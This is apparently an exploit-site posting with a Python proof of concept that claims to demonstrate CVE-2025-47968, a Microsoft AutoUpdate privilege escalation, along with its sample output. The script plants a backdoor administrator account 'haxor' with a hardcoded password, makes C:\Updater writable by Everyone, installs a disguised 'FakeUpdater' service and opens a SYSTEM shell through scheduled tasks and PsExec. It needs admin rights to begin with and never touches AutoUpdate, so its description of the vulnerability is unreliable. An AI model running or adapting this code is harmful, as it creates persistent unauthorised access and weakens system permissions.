📄 Microsoft AutoUpdate Privilege Escalation

# Titles: CVE-2025-47968-Core-Logic Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability
    # Author: nu11secur1ty
    # Date: 07/03/2025
    # Vendor: https://www.microsoft.com/en-us
    # Software: https://www.microsoft.com/en-us/d/windows-11-pro/dg7gmgf0d8h4
    # Reference: https://portswigger.net/web-security/access-control
    
    ## Description:
    
    This Python script simulates the core logic of CVE-2025-47968 on Windows
    systems. It demonstrates privilege escalation by:
    
    - Creating a new user `haxor` with administrative privileges.
    - Using NSSM (Non-Sucking Service Manager) to install and run a malicious
    service.
    - Leveraging scheduled tasks to escalate the user to SYSTEM-level
    privileges.
    - Launching a SYSTEM-level command shell using PsExec.
    
    ## Prerequisites
    
    - Windows system with administrative rights.
    - `nssm.exe` placed in `C:\nssm\nssm.exe`.
    - `psexec.exe` placed in the same directory as the Python script.
    - Python 3 installed.
    
    ## How It Works
    
    1. Checks if the script is run with administrator privileges.
    2. Creates directory `C:\Updater` and sets full permissions.
    3. Drops a batch file to add the user `haxor` and add it to administrators.
    4. Uses NSSM to install a service that runs this batch file.
    5. Starts the service to create the user.
    6. Uses scheduled tasks to add the user to administrators group as SYSTEM.
    7. Creates a scheduled task to open a SYSTEM shell via PowerShell.
    8. Runs PsExec to open an interactive SYSTEM command prompt.
    
    ## Usage
    
    Run the script as administrator:
    
    ```powershell
    python simulate_cve_2025_47968.py
    ```
    Output should be:
    ```
    [+] Created folder: C:\Updater
    [+] Running: icacls "C:\Updater" /grant Everyone:(OI)(CI)F /T
    processed file: C:\Updater
    processed file: C:\Updater\update.bat
    Successfully processed 2 files; Failed processing 0 files
    [+] Dropped malicious batch file at: C:\Updater\update.bat
    [+] Running: "C:\nssm\nssm.exe" stop FakeUpdater
    FakeUpdater: STOP: The operation completed successfully.
    [+] Running: "C:\nssm\nssm.exe" remove FakeUpdater confirm
    Service "FakeUpdater" removed successfully!
    [+] Running: "C:\nssm\nssm.exe" install FakeUpdater cmd.exe /c
    "C:\Updater\update.bat"
    Service "FakeUpdater" installed successfully!
    [+] Running: sc stop FakeUpdater
    [SC] ControlService FAILED 1062:
    
    The service has not been started.
    
    [*] Service not running or already stopped, continuing...
    [+] Running: sc start FakeUpdater
    
    SERVICE_NAME: FakeUpdater
            TYPE               : 10  WIN32_OWN_PROCESS
            STATE              : 2  START_PENDING
                                    (NOT_STOPPABLE, NOT_PAUSABLE,
    IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x7d0
            PID                : 1436
            FLAGS              :
    [*] Waiting 5 seconds for the batch to finish executing...
    [+] Success! User 'haxor' was created and added to administrators.
    [*] Attempting to escalate user to SYSTEM privileges...
    [+] Running: schtasks /Create /TN EscalateToSystem /TR "net localgroup
    administrators haxor /add" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM
    WARNING: Task may not run because /ST is earlier than current time.
    SUCCESS: The scheduled task "EscalateToSystem" has successfully been
    created.
    [+] Running: schtasks /Run /TN EscalateToSystem
    SUCCESS: Attempted to run the scheduled task "EscalateToSystem".
    [+] Running: schtasks /Delete /TN EscalateToSystem /F
    SUCCESS: The scheduled task "EscalateToSystem" was successfully deleted.
    [+] Escalation task executed. 'haxor' should now have SYSTEM-level admin
    rights.
    [*] Attempting to open SYSTEM shell with psexec...
    [+] Running: "C:\Users\pwnedpc\Desktop\CVE-2025-47968\psexec.exe" -s -i
    cmd.exe
    
    PsExec v2.43 - Execute processes remotely
    Copyright (C) 2001-2023 Mark Russinovich
    Sysinternals - www.sysinternals.com
    ```
    ## Important Notes
    
    - The script requires `nssm.exe` and `psexec.exe` in specified locations.
    - The SYSTEM shell opening may not always show a visible window due to
    system policies.
    - Use responsibly and only on systems you have permission to test.
    
    ## Disclaimer
    
    This code is for educational purposes only. Unauthorized use may violate
    laws and policies.
    
    # Reproduce:
    - Video:
    [href](https://www.youtube.com/watch?v=h64Rs45yuN4)
    
    - GitHub:
    [href](
    https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47968)
    
    # Donate, if you are not ashamed!
    [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
    
    # Time spent:
    03:15:00
    
    
    Proof of Concept:
    
    #!/usr/bin/python
    # Python PoC – CVE-2025-47968 Core Logic (Windows Simulation)
    # nu11secur1ty 2025
    import os
    import subprocess
    import ctypes
    import sys
    import time
    
    def is_admin():
        try:
            return ctypes.windll.shell32.IsUserAnAdmin()
        except:
            return False
    
    def run(cmd):
        print(f"[+] Running: {cmd}")
        subprocess.run(cmd, shell=True, check=True)
    
    def check_user_exists(username):
        try:
            result = subprocess.run(f'net user {username}', shell=True, capture_output=True, text=True)
            return "The user name could not be found" not in result.stdout
        except:
            return False
    
    def check_user_in_admins(username):
        try:
            result = subprocess.run('net localgroup administrators', shell=True, capture_output=True, text=True)
            return username.lower() in result.stdout.lower()
        except:
            return False
    
    def escalate_to_system(username):
        task_name = "EscalateToSystem"
        cmd = f'net localgroup administrators {username} /add'
    
        create_task_cmd = (
            f'schtasks /Create /TN {task_name} /TR "{cmd}" /SC ONCE /ST 00:00 /RL HIGHEST /F /RU SYSTEM'
        )
        run(create_task_cmd)
        run(f'schtasks /Run /TN {task_name}')
        run(f'schtasks /Delete /TN {task_name} /F')
    
    def open_system_shell_with_psexec():
        # psexec.exe is in the same directory as this script
        script_dir = os.path.dirname(os.path.abspath(__file__))
        psexec_path = os.path.join(script_dir, "psexec.exe")
    
        if not os.path.isfile(psexec_path):
            print(f"[!] ERROR: psexec.exe not found at {psexec_path}. Download from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec")
            return
    
        cmd = f'"{psexec_path}" -s -i cmd.exe'
        run(cmd)
    
    def main():
        if not is_admin():
            print("[!] Please run this script as Administrator.")
            sys.exit(1)
    
        nssm_path = r"C:\nssm\nssm.exe"
        if not os.path.isfile(nssm_path):
            print(f"[!] ERROR: nssm.exe not found at {nssm_path}")
            print("Download nssm from https://nssm.cc/download and place nssm.exe at this path.")
            sys.exit(1)
    
        vuln_path = r"C:\Updater"
        os.makedirs(vuln_path, exist_ok=True)
        print(f"[+] Created folder: {vuln_path}")
    
        run(f'icacls "{vuln_path}" /grant Everyone:(OI)(CI)F /T')
    
        batch_path = os.path.join(vuln_path, "update.bat")
        with open(batch_path, "w") as f:
            f.write("@echo off\n")
            f.write("net user haxor Passw0rd123 /add\n")
            f.write("net localgroup administrators haxor /add\n")
        print(f"[+] Dropped malicious batch file at: {batch_path}")
    
        service_name = "FakeUpdater"
        username = "haxor"
    
        try:
            run(f'"{nssm_path}" stop {service_name}')
        except subprocess.CalledProcessError:
            print("[*] Service not running or cannot stop (may not exist), continuing...")
    
        try:
            run(f'"{nssm_path}" remove {service_name} confirm')
        except subprocess.CalledProcessError:
            print("[*] Service may not exist yet, continuing...")
    
        run(f'"{nssm_path}" install {service_name} cmd.exe /c "{batch_path}"')
    
        try:
            run(f'sc stop {service_name}')
        except subprocess.CalledProcessError:
            print("[*] Service not running or already stopped, continuing...")
    
        run(f'sc start {service_name}')
    
        print("[*] Waiting 5 seconds for the batch to finish executing...")
        time.sleep(5)
    
        user_exists = check_user_exists(username)
        user_admin = check_user_in_admins(username)
    
        if user_exists and user_admin:
            print(f"[+] Success! User '{username}' was created and added to administrators.")
            print("[*] Attempting to escalate user to SYSTEM privileges...")
            escalate_to_system(username)
            print("[+] Escalation task executed. 'haxor' should now have SYSTEM-level admin rights.")
            print("[*] Attempting to open SYSTEM shell with psexec...")
            open_system_shell_with_psexec()
        elif user_exists:
            print(f"[!] User '{username}' was created but is NOT in administrators group.")
        else:
            print(f"[!] User '{username}' was NOT created. Something went wrong.")
    
    if __name__ == "__main__":
        main()